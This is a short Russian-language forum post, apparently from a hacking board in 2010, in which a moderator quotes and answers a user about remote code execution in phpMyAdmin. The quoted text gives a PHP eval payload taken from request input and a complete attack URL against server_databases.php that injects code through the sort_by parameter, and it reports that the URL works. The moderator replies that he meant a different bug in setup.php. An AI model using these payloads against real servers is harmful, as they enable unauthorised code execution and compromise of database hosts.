17.06.2010, 20:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от m0Hze
Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:
PHP код:
<?php
$sting = ${@eval($_REQUEST[c])};
?>
Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
Код:
/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
Э, я про /scripts/setup.php, я другую багу имел ввиду.
|
|
|